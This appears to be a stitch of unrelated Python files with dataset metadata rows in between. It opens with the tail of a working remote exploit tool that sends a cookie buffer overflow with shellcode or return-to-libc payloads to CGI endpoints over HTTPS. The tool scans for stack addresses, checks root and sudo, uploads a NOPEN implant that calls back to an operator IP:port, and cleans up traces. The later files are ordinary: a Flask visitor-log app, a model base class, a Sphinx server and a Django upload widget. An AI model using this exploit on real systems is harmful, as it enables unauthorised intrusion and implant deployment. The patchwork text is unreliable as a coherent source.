        # patch the (masked) lengths and mask words into the decoder stub
        decoder = decoder[0] + deco_len + decoder[5] + maskw + \
                  decoder[10:15] + exec_len + decoder[19:21] + maskw + \
                  decoder[25:29] + chr(maskb) + decoder[30:]
        cookie = shellcode.finder + decoder + execute
        if len(cookie) > 1036:
            raise Exception("ERROR: Cookie shellcode must be <= 1036 bytes!")
        sled_len = (1036 - len(cookie)) # 1036 = buffer len to overflow
        logging.info("Using decoder masking byte %#x" % maskb)
        logging.info("Using %d-byte NOP sled" % sled_len)
        cookie = chr(0x90)*sled_len + cookie + pack("<I", address)
    if options.op == "nopen":
        # nopen upload: body is followed by the noserver binary and tiny-exec
        return (cookie, body + options.nopen + shellcode.tiny_exec)
    else:
        return (cookie, body)
def get_response(options, address):
    """Send an exploit to the target and get its response.

    `address` is an {action, stack} dict; symbolic stack values select the
    return-to-libc payload variant.  Exits the process on socket errors;
    otherwise returns the httplib response object.
    """
    # some addresses are fake, so we remap them here
    remap_addr = { 'libc.0': 0x0804a625L, 'libc.1': 0x2aab757c }
    method = "GET"
    if address["stack"] in remap_addr:
        real_addr = remap_addr[address["stack"]]
        (cookie, body) = build_payload(options, real_addr, libc=True)
    else:
        (cookie, body) = build_payload(options, address["stack"], libc=False)
    conn = httplib.HTTPSConnection(options.target_ip, options.port)
    # httplib debug output would dump the whole payload; skip it when large
    if logging.getLogger().level <= logging.DEBUG:
        if len(body) + len(cookie) > 10240:
            logging.debug("WARNING: debug mode selected, but the amount of " +
                          "data being sent to the server is large (> 10kb). " +
                          "Temporarily disabling debug output.")
        else:
            conn.set_debuglevel(3)
    logging.info("Sending %s request (%d-byte cookie) to https://%s:%s%s" %
                 (method, len(cookie), options.target_ip, options.port,
                  address["action"]))
    try:
        conn.request(method, address["action"], body=body,
                     headers={"Cookie": cookie})
    except socket.error, e:
        print "Connection error %d: %s" % tuple(e)
        sys.exit(1)
    return conn.getresponse()
####################
# "Main" functions #
####################
def scan(options):
    """Scan for which vulnerability / stack address to use.

    Tries each candidate (action, stack address) pair from the config
    (known ETag) or the SCANPLAN (unknown ETag) until one returns HTTP
    200, then decodes the probe shellcode's status words and prints the
    config line that should be recorded for this ETag.
    """
    addrs = get_details_for_etag(options)
    if addrs is None:
        # unknown version: fall back to the SCANPLAN candidates
        addrs = options.scanplan
        if options.maxfails > 0:
            addrs = addrs[:options.maxfails]
    else:
        logging.info("--scan initiated against a known version: Only " +
                     "sending one scan (expect success!)")
    logging.debug("scanplan = [" +
                  ",".join(["(%s, %s)" % (x["action"],
                                          type(x["stack"]) == long and \
                                          ("%#010x" % x["stack"]) or \
                                          x["stack"])
                            for x in addrs]) +
                  "]")
    if len(addrs) == 0:
        print "ERROR: No valid SCANPLAN found for your ETag. If you supplied an --action argument, try again without it. Otherwise, contact a developer."
        return
    skip_404 = dict() # CGI's that aren't on the target
    for (i,addr) in enumerate(addrs):
        logging.info("------------------------------------------------")
        # symbolic (string) stack values are return-to-libc attempts
        if type(addr["stack"]) == str:
            print "Atmpt. %d of %d: Trying return to %s against %s" % \
                  (i+1, len(addrs), addr["stack"], addr["action"])
        else:
            print "Atmpt %d of %d: Trying stack addr %#010x against %s" % \
                  (i+1, len(addrs), addr["stack"], addr["action"])
        cgi_name = addr["action"][:addr["action"].find("?")]
        if cgi_name in skip_404:
            logging.info("... skipped due to HTTP %d" % skip_404[cgi_name])
            continue
        resp = get_response(options, addr)
        logging.info(" received HTTP %s %s" % (resp.status, resp.reason))
        if resp.status == 200:
            address = addr
            break
        # 3xx/4xx means the CGI itself is missing; skip its other candidates
        if resp.status >= 300 and resp.status < 500:
            skip_404[cgi_name] = resp.status
            logging.info("Skipping all future scans against %s due to HTTP status" % cgi_name)
        sleep(options.delay)
    if resp.status != 200:
        if len(addrs) == 1 and options.maxfails != 1:
            print "ERROR: Vulnerability parameter recorded in %s FAILED." % \
                  options.etag_file
            print " Try deleting the entry and running --scan again."
        else:
            print "All scans failed. No vulnerability found."
        return
    data = resp.read()
    logging.debug("received data(%d): %s" % (len(data), repr(data)))
    if len(data) < 16:
        print "ERROR: Expected at least 16 bytes from exploit, but only " + \
              "got %d" % len(data)
        return
    # magic status words emitted by the probe shellcode
    code_ack = 0xc0edbabeL
    code_sudo = 0x900d50d0L
    code_nosudo = 0xbad500d0L
    code_root = 0xb00500d0L
    code_exec = 0xbaade7ecL
    (ack, stack, euid, sudo) = unpack("<IIII", data[:16])
    if ack == code_ack:
        data = data[16:]
        print "Received ACK from exploit payload."
        print "================================================="
        print "Effective UID: %d" % euid
        if sudo == code_sudo:
            print "/tos/bin/sudo appears to be available."
            print "Output of '/tos/bin/sudo /usr/bin/id':"
            if unpack("<I", data[:4])[0] == code_exec:
                print " ERROR: execve() failed!"
            else:
                print data
                data = ""
        elif sudo == code_nosudo:
            print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
            print "/tos/bin/sudo is NOT available!"
            print "May not be able to escalate privileges!"
            print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
        elif sudo == code_root:
            print "Already root, so skipping sudo check"
        else:
            print "Unknown sudo status: got %#x but expected %#x or %#x" % \
                  (sudo, code_sudo, code_nosudo)
        if len(data):
            print "Received unexpected data:", repr(data)
        print "================================================="
        if type(address["stack"]) == str:
            print "Successful libc exploit."
            config_line = " ETAG = %s : %s : %s" % \
                          (options.etag, address["action"], address["stack"])
        else:
            # the probe reports its exact stack address back to us
            print "Successful probe stack address: %#010x" % address["stack"]
            print "Exact stack address : %#010x" % stack
            config_line = " ETAG = %s : %s : %#010x" % \
                          (options.etag, address["action"], stack)
        if len(addrs) == 1:
            print "Vulnerability for ETag [%s] confirmed!" % options.etag
        else:
            print "Add this line to %s:" % options.etag_file
            print config_line
            print "and then add the version column when known."
    else:
        print "ERROR! Received invalid ack word [%#x] vs [%#x]" % (ack,code_ack)
        print "received (%d): %s" % (len(data), repr(data))
        print "Exploit failed."
def nopen(options):
    """Upload noserver to the target and have it call back.

    Requires a confirmed ETAG entry in the config, a local noserver
    binary (-n or NOSERVER config line) and a callback ip:port (-c).
    Streams 4-byte status codes from the exploit and prints their
    meanings until the connection closes.
    """
    addr = get_details_for_etag(options)
    if addr is None:
        logging.error("ERROR: No entry for ETag [%s] in %s." %
                      (options.etag, options.etag_file))
        logging.error(" Perhaps you should run with --scan?")
        return
    if not options.noserver:
        options.parser.error("--nopen also requires -n/--noserver or a " +
                             "NOSERVER entry in %s" % options.etag_file)
    if not options.callback_ip:
        options.parser.error("--nopen also requires -c/--callback!")
    try:
        fh = file(options.noserver)
        options.nopen = fh.read()
        fh.close()
    except:
        print "ERROR: Could not read noserver file [%s]" % (options.noserver)
        return
    # 4-byte status words the upload shellcode sends back, and their meanings
    codes = {
        0xdeadbeefL: "Received ACK from exploit. Uploading NOPEN.",
        0xc0edbabeL: "Uploaded NOPEN! Callback commencing.",
        0x00000001L: "ERROR: Could not read POSTed NOPEN binary.",
        0x00000002L: "ERROR: Could not write NOPEN binary to target disk.",
        0x00000003L: "ERROR: Unexpected EOF while uploading NOPEN binary.",
        0x00000004L: "ERROR: Could not open() upload filename on target.",
        0x00000005L: "ERROR: exeve() on uploaded NOPEN binary failed.",
        0x00000006L: "warning: Could not close() uploaded file on target. Continuing anyway. (Is there another NOPEN session already alive?)",
        0x00000007L: "warning: sudo failed! Running NOPEN as nobody.",
    }
    resp = get_response(options, addr[0])
    while True:
        try:
            data = resp.read(4)
        except ValueError:
            break
        if len(data) == 0:
            break
        logging.debug("received data(%d): %s" % (len(data), repr(data)))
        code = unpack("<I", data)[0]
        if code in codes:
            print codes[code]
        else:
            # unknown status: dump everything else and stop
            print "ERROR: Unknown status code %#010x" % code
            data += resp.read()
            print data
            break
def cleanup(options):
    """Try to delete uploaded files from the target.

    Sends the cleanup shellcode, then decodes the stream of 4-byte status
    words it returns.  Each word is a base code (stat/unlink result)
    OR-ed with a file mask (noserver or tiny-exec); the message table is
    pre-expanded for every mask/code combination.
    """
    # extract uploaded filenames from shellcode (NUL-separated strings)
    null0 = shellcode.cleanup.index("\x00")
    null1 = shellcode.cleanup.index("\x00", null0+1)
    noserver_upload = shellcode.cleanup[2:null0]
    tinyexec_upload = shellcode.cleanup[null0+1:null1]
    codes = {
        0x00000002L: "ERROR: unlink('%s') (%s) - cleanup NOT successful - file is still sitting on target!",
        0x00000100L: "success: stat('%s') (%s) - file is sitting on target",
        0x00000200L: "success: unlink('%s') (%s) - file removed from target",
    }
    masks = {
        0x00010000L: (noserver_upload, 'noserver'),
        0x00020000L: (tinyexec_upload, 'tiny-exec'),
    }
    # expand every (mask, code) pair into a concrete message, then drop
    # the un-masked templates
    orig_codes = codes.keys()
    for m in masks:
        for c in orig_codes:
            codes[m ^ c] = codes[c] % masks[m]
    for c in orig_codes:
        del codes[c]
    codes[0x00010001L] = "warning: stat() on '%s' (noserver) failed - file not uploaded? This may be normal if the exploit upload failed or the file was deleted manually." % noserver_upload
    codes[0x00020001L] = "warning: stat() on '%s' (tiny-exec) failed - file not uploaded? This may be normal if the exploit upload failed, the file was deleted manually, or we did not need to upload tiny-exec (i.e., we were already running as EUID root)." % tinyexec_upload
    addr = get_details_for_etag(options)
    if addr is None:
        logging.error("ERROR: No entry for ETag [%s] in %s." %
                      (options.etag, options.etag_file))
        logging.error(" Perhaps you should run with --scan?")
        return
    resp = get_response(options, addr[0])
    data = resp.read()
    logging.debug("received data(%d): %s" % (len(data), repr(data)))
    if len(data) % 4 != 0:
        print "ERROR: Expected 4-byte status codes but got %d bytes:"%len(data)
        print repr(data)
        return
    from_exploit = unpack("<" + ("I" * (len(data)/4)), data)
    for code in from_exploit:
        if code in codes:
            print codes[code]
        else:
            print "ERROR: Unknown status code %#010x" % code
def main():
    """Parse command line arguments and dispatch to scan/nopen/cleanup."""
    # optparse callback that records the chosen operation and rejects a
    # second --scan/--nopen/--cleanup flag
    def handle_op_arg(option, opt_str, value, parser, opname):
        if parser.values.op:
            raise optparse.OptionValueError(
                "Only one of --probe, --scan, --nopen, or --cleanup should " +
                "be supplied")
        parser.values.op = opname
    parser = optparse.OptionParser(version=VERSION, usage="""%prog [options]
See -h for specific options (some of which are required).
Examples:
Scan to find (unknown versions) or confirm (known versions) vulnerability:
%prog -t 1.2.3.4 -e 012-345-6789 --scan -v
Once a valid entry is in ELBO.config, upload nopen:
%prog -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v
Delete uploaded files from the previous step:
%prog -t 1.2.3.4 -e 012-345-6789 --cleanup -v""")
    parser.add_option("-t", "--target-ip", dest="target_ip", action="store",
                      type="string", help="Target's IP address")
    parser.add_option("-e", "--etag", dest="etag", action="store",
                      type="string", help="Target's ETag string")
    parser.add_option("--scan", dest="op", action="callback",
                      callback=handle_op_arg, callback_args=("scan",),
                      help="Scan for vulnerability parameters")
    parser.add_option("--delay", dest="delay", action="store", type="int",
                      default=1, help="Delay in seconds between probes " +
                      "during --scan (default=1 second)")
    parser.add_option("-f", "--max-fails", dest="maxfails", action="store",
                      type="int", default=0, help="Total maximum number of " +
                      "failed scan attempts before aborting (default=0, run " +
                      "all scans); see also --max-fails-action")
    parser.add_option("--max-fails-action", dest="maxfailsaction",
                      action="store", type="int", default=0, help="Maximum " +
                      "number of failed scan attempts on a single target " +
                      "CGI action before moving on to the next (default=0, " +
                      "run all scans)")
    parser.add_option("--nopen", dest="op", action="callback",
                      callback=handle_op_arg, callback_args=("nopen",),
                      help="Upload NOPEN to target (requires -n and -c)")
    parser.add_option("-n", "--noserver", dest="noserver", action="store",
                      type="string", help="Path to static noserver binary " +
                      "(overrides NOSERVER setting in %s)" % DEFAULT_ETAG_FILE)
    parser.add_option("-c", "--callback", dest="callback_ip", action="store",
                      type="string", help="Callback IP:Port for --nopen " +
                      "(e.g., 127.0.0.1:12345")
    parser.add_option("--cleanup", dest="op", action="callback",
                      callback=handle_op_arg, callback_args=("cleanup",),
                      help="Try to delete uploaded files from target")
    parser.add_option("-p", "--port", dest="port", action="store", type="int",
                      default=443, help="Destination port (default=443)")
    parser.add_option("--config", dest="etag_file", action="store",
                      type="string", default=DEFAULT_ETAG_FILE,
                      help="ETag configuration file (default=%s)" %
                      DEFAULT_ETAG_FILE)
    parser.add_option("-v", "--verbose", dest="verbose", action="store_true",
                      help="Turn on verbose output")
    parser.add_option("-d", "--debug", dest="debug", action="store_true",
                      help="Turn on debugging output")
    parser.add_option("--action", dest="action", action="store", type="string",
                      default="", help="Only try actions from ELBO.config " +
                      "that contain ACTION as a substring")
    (options, args) = parser.parse_args()
    if len(args) != 0:
        parser.error("invalid arguments")
    # make sure we have a target IP and his ETag
    if not options.target_ip:
        parser.error("-t/--target-ip is required!")
    if not options.etag:
        parser.error("-e/--etag is required!")
    # handle -v and -d via logging module
    level = logging.ERROR
    if options.verbose:
        level = logging.INFO
    if options.debug:
        level = logging.DEBUG
    logging.basicConfig()
    logging.getLogger().setLevel(level)
    logging.getLogger().handlers[0].setFormatter(logging.Formatter("%(msg)s"))
    # the op functions report argument errors through options.parser
    options.parser = parser
    # dispatch to the correct operation
    if not options.op:
        parser.error("One of --scan, --nopen, or --cleanup must " +
                     "be supplied")
    dispatch = dict()
    for func in [scan, nopen, cleanup]:
        dispatch[func.func_name] = func
    dispatch[options.op](options)
    return
# Script entry point.
if __name__ == '__main__':
    main()
| 39.430868 | 273 | 0.544157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,939 | 0.36447 |
a4e8d966c41d61cf7973a0faa9d826fdc0196a65 | 8,716 | py | Python | edu_visitor/visitor_logs/routes.py | covrebo/edu_visitor | 2759519eef97057ca01ed26f556ab335167fe084 | [
"MIT"
] | null | null | null | edu_visitor/visitor_logs/routes.py | covrebo/edu_visitor | 2759519eef97057ca01ed26f556ab335167fe084 | [
"MIT"
] | null | null | null | edu_visitor/visitor_logs/routes.py | covrebo/edu_visitor | 2759519eef97057ca01ed26f556ab335167fe084 | [
"MIT"
] | null | null | null | from flask import Blueprint, render_template, url_for, session, flash, redirect, request
from edu_visitor import db
from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm
from edu_visitor.models import StudentLog, VisitorLog
from flask_login import login_required
# Blueprint grouping all student/visitor sign-in and sign-out routes.
visitor_logs = Blueprint('visitor_logs', __name__)
# Route to the sign-in page for students
@visitor_logs.route('/student-signin', methods=['GET', 'POST'])
def student_signin():
    """Record a student signing IN to the building stored in the session."""
    form = StudentSignInForm()
    if form.validate_on_submit():
        # Create an entry to add to the database
        post = StudentLog(student_name=form.student_name.data, grade=form.grade.data, parent_name=form.parent.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='In')
        db.session.add(post)
        db.session.commit()
        flash(f"You have successfully signed in to { session['site'] }!",
              category='success')
        return redirect(url_for('main.home'))
    return render_template('student-signin.html', title='Student Sign-in', form=form)
# Route to the sign-out page for students
@visitor_logs.route('/student-signout', methods=['GET', 'POST'])
def student_signout():
    """Record a student signing OUT of the building stored in the session."""
    form = StudentSignOutForm()
    if form.validate_on_submit():
        # Create an entry to add to the database
        post = StudentLog(student_name=form.student_name.data, grade=form.grade.data, parent_name=form.parent.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='Out')
        db.session.add(post)
        db.session.commit()
        flash(f"You have successfully signed out of { session['site'] }!",
              category='success')
        return redirect(url_for('main.home'))
    return render_template('student-signout.html', title='Student Sign-out', form=form)
# Route to the sign-in page for visitors
@visitor_logs.route('/visitor-signin', methods=['GET', 'POST'])
def visitor_signin():
    """Record a visitor signing IN to the building stored in the session."""
    form = VisitorSignInForm()
    if form.validate_on_submit():
        # Create an entry to add to the database
        post = VisitorLog(visitor_name=form.visitor_name.data, student_name=form.student_name.data, grade=form.grade.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='In')
        db.session.add(post)
        db.session.commit()
        flash(f"You have successfully signed in to { session['site'] }!",
              category='success')
        return redirect(url_for('main.home'))
    return render_template('visitor-signin.html', title='Visitor Sign-in', form=form)
# Route to the sign-out page for visitors
@visitor_logs.route('/visitor-signout', methods=['GET', 'POST'])
def visitor_signout():
    """Record a visitor signing OUT of the building stored in the session."""
    form = VisitorSignOutForm()
    if form.validate_on_submit():
        # Create an entry to add to the database (sign-out stores name only)
        post = VisitorLog(visitor_name=form.visitor_name.data, building=session['site'], direction='Out')
        db.session.add(post)
        db.session.commit()
        flash(f"You have successfully signed out of { session['site'] }!",
              category='success')
        return redirect(url_for('main.home'))
    return render_template('visitor-signout.html', title='Visitor Sign-out', form=form)
# Route to display a summary of the day's student sign-ins and sign-outs
@visitor_logs.route('/daily-summary')
@login_required
def daily_summary():
    """Show paginated student/visitor in/out logs for the session's building."""
    # TODO: Create DB calls to create the dictionaries only for the current day
    # Query database for student visitor logs entering the building and get the correct page to display from the URL
    student_page_in = request.args.get('student_page_in', 1, type=int)
    student_log_in = StudentLog.query.order_by(StudentLog.id.desc()).filter_by(direction='In', building=session['site']).paginate(page=student_page_in, per_page=5)
    # Query database for student visitor logs leaving the building
    student_page_out = request.args.get('student_page_out', 1, type=int)
    student_log_out = StudentLog.query.order_by(StudentLog.id.desc()).filter_by(direction='Out', building=session['site']).paginate(page=student_page_out, per_page=5)
    # Query database for visitor logs entering the building
    visitor_page_in = request.args.get('visitor_page_in', 1, type=int)
    visitor_log_in = VisitorLog.query.order_by(VisitorLog.id.desc()).filter_by(direction='In', building=session['site']).paginate(page=visitor_page_in, per_page=5)
    # Query database for visitor logs leaving the building
    visitor_page_out = request.args.get('visitor_page_out', 1, type=int)
    visitor_log_out = VisitorLog.query.order_by(VisitorLog.id.desc()).filter_by(direction='Out', building=session['site']).paginate(page=visitor_page_out, per_page=5)
    return render_template('daily-summary.html', student_log_in=student_log_in, student_log_out=student_log_out, visitor_log_in=visitor_log_in, visitor_log_out=visitor_log_out, title='Daily Summary')
# A route to view a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>')
@login_required
def view_student_signin(post_id):
    """Display a single student log entry (404 if the id does not exist)."""
    post = StudentLog.query.get_or_404(post_id)
    return render_template('student-view.html', title="Update Entry", post=post)
# A route to update a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/update', methods=['GET', 'POST'])
@login_required
def update_student_signin(post_id):
    """Edit an existing student log entry; GET pre-populates, POST saves."""
    post = StudentLog.query.get_or_404(post_id)
    form = StudentUpdateForm()
    if form.validate_on_submit():
        post.student_name = form.student_name.data
        post.grade = form.grade.data
        post.parent_name = form.parent.data
        post.reason = form.reason.data
        post.reason_other = form.reason_other.data
        post.direction = form.direction.data
        db.session.commit()
        flash("Your post has been updated.", 'success')
        return redirect(url_for('visitor_logs.daily_summary'))
    # Pre-populate the form
    elif request.method == 'GET':
        form.student_name.data = post.student_name
        form.grade.data = post.grade
        form.parent.data = post.parent_name
        form.reason.data = post.reason
        form.reason_other.data = post.reason_other
        form.direction.data = post.direction
    return render_template('student-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_student_signin(post_id):
    """Remove a student log entry, then return to the daily summary."""
    entry = StudentLog.query.get_or_404(post_id)
    db.session.delete(entry)
    db.session.commit()
    flash('The entry has been deleted.', category='success')
    return redirect(url_for('visitor_logs.daily_summary'))
# A route to view a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>')
@login_required
def view_visitor_signin(post_id):
    """Display a single visitor sign-in/out entry, or 404 if it does not exist."""
    post = VisitorLog.query.get_or_404(post_id)
    # Fixed template name: it was 'visitor_logs.visitor-view.html', which
    # mistakenly prefixed the blueprint name onto the template file name.
    # Every sibling route renders a bare file name ('student-view.html',
    # 'visitor-update.html'), so the blueprint-prefixed path could not resolve.
    return render_template('visitor-view.html', title="Update Entry", post=post)
# A route to update a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>/update', methods=['GET', 'POST'])
@login_required
def update_visitor_signin(post_id):
    """Edit a visitor log entry.

    A valid POST copies the form fields onto the entry and commits; a GET
    pre-fills the form with the entry's current values.
    """
    post = VisitorLog.query.get_or_404(post_id)
    form = VisitorUpdateForm()
    # (model attribute, form field) pairs shared by the save and pre-fill paths.
    field_map = [
        ('visitor_name', form.visitor_name),
        ('student_name', form.student_name),
        ('grade', form.grade),
        ('reason', form.reason),
        ('reason_other', form.reason_other),
        ('direction', form.direction),
    ]
    if form.validate_on_submit():
        for attr, field in field_map:
            setattr(post, attr, field.data)
        db.session.commit()
        flash("Your post has been updated.", 'success')
        return redirect(url_for('visitor_logs.daily_summary'))
    elif request.method == 'GET':
        # Pre-populate the form from the stored entry.
        for attr, field in field_map:
            field.data = getattr(post, attr)
    return render_template('visitor-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for visitor
@visitor_logs.route('/visitor-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_visitor_signin(post_id):
    """Remove a visitor log entry, then return to the daily summary."""
    entry = VisitorLog.query.get_or_404(post_id)
    db.session.delete(entry)
    db.session.commit()
    flash('The entry has been deleted.', category='success')
    return redirect(url_for('visitor_logs.daily_summary'))
a4ea3d61587577e8897b867e636a3cccaeb49674 | 1,657 | py | Python | abstract_model.py | mandt-lab/adversarial-negative-sampling | a71a9bd8e814b132ec094bd2c5d080edcb1bccad | [
"MIT"
] | 15 | 2020-03-27T20:48:07.000Z | 2022-01-21T09:47:14.000Z | abstract_model.py | mandt-lab/adversarial-negative-sampling | a71a9bd8e814b132ec094bd2c5d080edcb1bccad | [
"MIT"
] | 1 | 2020-11-13T16:04:56.000Z | 2020-11-13T16:04:56.000Z | abstract_model.py | mandt-lab/adversarial-negative-sampling | a71a9bd8e814b132ec094bd2c5d080edcb1bccad | [
"MIT"
] | 4 | 2020-02-23T02:21:45.000Z | 2020-09-29T03:07:54.000Z | import sys
import abc
import tensorflow as tf
import numpy as np
import optimizer
class AbstractModel(abc.ABC):
    '''Abstract base class for knowledge graph embedding models.

    You won't usually want to derive directly from this class. In most cases, you'll
    want to derive from either `AbstractMainModel` or from `AbstractAuxModel`.
    '''

    @abc.abstractmethod
    def unnormalized_score(self, emb_in_e, emb_r, emb_all_e, args):
        '''Define a tensorflow op that calculates the prediction scores (logits).

        Arguments:
        emb_in_e -- Embedding vectors of the input entities, i.e., the entities on which
            we condition. A dict that maps labels (strings) to tensors of shape
            `(minibatch_size, num_samples, embedding_dimensions...)`.
        emb_r -- Embedding vectors of the relations. If reciprocal relations are used
            then the caller should pass in different embedding vectors for head or tail
            prediction. A dict that maps labels (strings) to tensors of shape
            `(minibatch_size, num_samples, embedding_dimensions...)`.
        emb_all_e -- Embedding vectors of all entities. A dict that maps labels (strings)
            to tensors of shape `(range_e, num_samples, embedding_dimensions...)`.
        args -- Namespace holding command line arguments.

        Returns:
        A tensor of shape `(num_samples, minibatch_size, range_e)` holding the
        unnormalized scores (logits); up to normalization these represent the
        negative log likelihood of the data. Should *not* be normalized to the
        batch size or sample size.
        '''
        pass
a4ea59238b7b0825e3fc20672e4667b0dd688bec | 165 | py | Python | fnss/traffic/__init__.py | brucespang/fnss | 8e1d95744347afa77383092e6f144980d84e222d | [
"BSD-2-Clause"
] | 114 | 2015-01-19T14:15:07.000Z | 2022-02-22T01:47:19.000Z | fnss/traffic/__init__.py | brucespang/fnss | 8e1d95744347afa77383092e6f144980d84e222d | [
"BSD-2-Clause"
] | 15 | 2016-02-11T09:09:02.000Z | 2021-04-05T12:57:09.000Z | fnss/traffic/__init__.py | brucespang/fnss | 8e1d95744347afa77383092e6f144980d84e222d | [
"BSD-2-Clause"
] | 36 | 2015-02-08T12:28:04.000Z | 2021-11-19T06:08:17.000Z | """Tools for creating and manipulating event schedules and traffic matrices"""
from fnss.traffic.eventscheduling import *
from fnss.traffic.trafficmatrices import *
| 41.25 | 78 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.472727 |
a4eac09718b988218fe43f31996cb5b72933482b | 687 | py | Python | sphinxviewer/main.py | badisa/sphinx-viewer | 484c74f9f407aa6bb36fb95dfd1f3a56e1942dfe | [
"MIT"
] | null | null | null | sphinxviewer/main.py | badisa/sphinx-viewer | 484c74f9f407aa6bb36fb95dfd1f3a56e1942dfe | [
"MIT"
] | null | null | null | sphinxviewer/main.py | badisa/sphinx-viewer | 484c74f9f407aa6bb36fb95dfd1f3a56e1942dfe | [
"MIT"
] | null | null | null | import os
import sys
from argparse import ArgumentParser
from sphinxviewer.sphinx import build_html
from sphinxviewer.server import serve_server
def main():
    """Build the documentation once, then start the live-reload server."""
    arg_parser = ArgumentParser(description="Live editing sphinx doc server")
    # No options are defined yet (port and build directory are planned
    # flags); parsing still provides --help support.
    arg_parser.parse_args()
    print("Building initial docs")
    # Source and build directories currently follow the sphinx defaults;
    # TODO: make them configurable.
    if not build_html(os.getcwd(), "_build"):
        sys.exit(1)
    serve_server(8888)
| 31.227273 | 88 | 0.71179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.467249 |
a4eb0fd565d81e7a6f39564ab37c7ad1acd391aa | 4,338 | py | Python | djng/forms/widgets.py | ParikhKadam/django-angular | 1fdd2ab3211ed1655acc2d172d826ed7f3ad0574 | [
"MIT"
] | 941 | 2015-01-01T18:17:43.000Z | 2022-02-26T07:45:40.000Z | djng/forms/widgets.py | ParikhKadam/django-angular | 1fdd2ab3211ed1655acc2d172d826ed7f3ad0574 | [
"MIT"
] | 228 | 2015-01-11T16:36:34.000Z | 2022-03-11T23:17:15.000Z | djng/forms/widgets.py | ParikhKadam/django-angular | 1fdd2ab3211ed1655acc2d172d826ed7f3ad0574 | [
"MIT"
] | 294 | 2015-01-04T09:01:33.000Z | 2022-02-26T07:45:41.000Z | import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
    """Django form widget rendering a drag-and-drop file upload area.

    The widget emits a ``<textarea>`` decorated with AngularJS/ng-file-upload
    attributes, plus a spinner, a delete button and (when a file is already
    stored) a download link. Subclasses may override ``filetype`` and
    ``update_attributes`` to specialize the preview (see ``DropImageWidget``).
    """

    # Signs the current file name so the upload view can verify it round-trips
    # untampered.
    signer = signing.Signer()

    def __init__(self, area_label, fileupload_url, attrs=None):
        # area_label: text shown inside the drop area.
        # fileupload_url: endpoint the Angular directive posts the file to.
        self.area_label = area_label
        self.fileupload_url = fileupload_url
        super(DropFileWidget, self).__init__(attrs)
        self.filetype = 'file'

    def render(self, name, value, attrs=None, renderer=None):
        """Return the widget's HTML for field `name` with current `value`."""
        # NOTE(review): this local import shadows the module-level import of
        # staticfiles_storage; it is redundant but harmless.
        from django.contrib.staticfiles.storage import staticfiles_storage
        extra_attrs = dict(attrs)
        # Angular hooks: ngf-drop/ngf-select call uploadFile() with this
        # widget's filetype, element id and ng-model.
        extra_attrs.update({
            'name': name,
            'class': 'djng-{}-uploader'.format(self.filetype),
            'djng-fileupload-url': self.fileupload_url,
            'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
            'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
        })
        # Let subclasses add a background preview / signed current-file attr.
        self.update_attributes(extra_attrs, value)
        final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
        elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
        # add a spinning wheel shown while an upload is in flight
        spinner_attrs = {
            'class': 'glyphicon glyphicon-refresh glyphicon-spin',
            'ng-cloak': True,
        }
        elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
        # add a delete icon
        # NOTE(review): the trailing space in 'djng-fileupload-button ' looks
        # accidental — confirm against the Angular directive before changing.
        icon_attrs = {
            'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
            'class': 'djng-btn-trash',
            'title': _("Delete File"),
            'djng-fileupload-button ': True,
            'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
            'ng-cloak': True,
        }
        elements.append(format_html('<img {} />', flatatt(icon_attrs)))
        # add a download icon, only when a file is already stored
        if value:
            download_attrs = {
                'href': value.url,
                'class': 'djng-btn-download',
                'title': _("Download File"),
                'download': True,
                'ng-cloak': True,
            }
            download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
            elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
        return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))

    def update_attributes(self, attrs, value):
        """Decorate `attrs` with a file-type icon background and a signed
        reference to the currently stored file (no-op when `value` is empty)."""
        if value:
            try:
                # NOTE: the tuple unpack rebinds `_` locally, shadowing the
                # ugettext_lazy alias for the rest of this method.
                content_type, _ = mimetypes.guess_type(value.file.name)
                extension = mimetypes.guess_extension(content_type)[1:]
            except (IOError, IndexError, TypeError):
                # Unknown/unguessable type: fall back to the generic icon.
                extension = '_blank'
            background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
            attrs.update({
                'style': 'background-image: url({});'.format(background_url),
                'current-file': self.signer.sign(value.name)
            })
class DropImageWidget(DropFileWidget):
    """Drop-area widget specialized for images: previews the stored image
    as a thumbnail background instead of a generic file-type icon."""

    def __init__(self, area_label, fileupload_url, attrs=None):
